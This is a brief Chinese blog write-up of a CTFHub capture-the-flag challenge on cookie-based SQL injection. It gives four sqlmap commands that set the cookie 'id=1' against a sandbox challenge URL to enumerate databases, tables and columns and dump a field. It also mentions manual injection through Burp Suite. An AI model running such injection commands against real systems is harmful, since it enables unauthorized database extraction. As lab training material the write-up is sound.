CTFHub-cookie注入

手工注入

    根据提示查找cookie值后通过burpsuite抓包改变cookie值来实现注入,不再赘述

 

 

sqlmap注入

    查询数据库名sqlmap.py -u http://challenge-9ae1c4fc157765eb.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 --dbs

 

 

    查询表名:sqlmap.py -u http://challenge-9ae1c4fc157765eb.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 -D sqli --tables

 

 

    查询字段名:sqlmap.py -u http://challenge-9ae1c4fc157765eb.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 -D sqli -T ggathoowju --columns

 

 

 

    dump出字段信息:sqlmap.py -u http://challenge-9ae1c4fc157765eb.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 -D sqli -T ggathoowju -C qtegoprsaa --dump

 

 

posted @ 2021-08-24 15:08  r1kka  阅读(304)  评论(0)    收藏  举报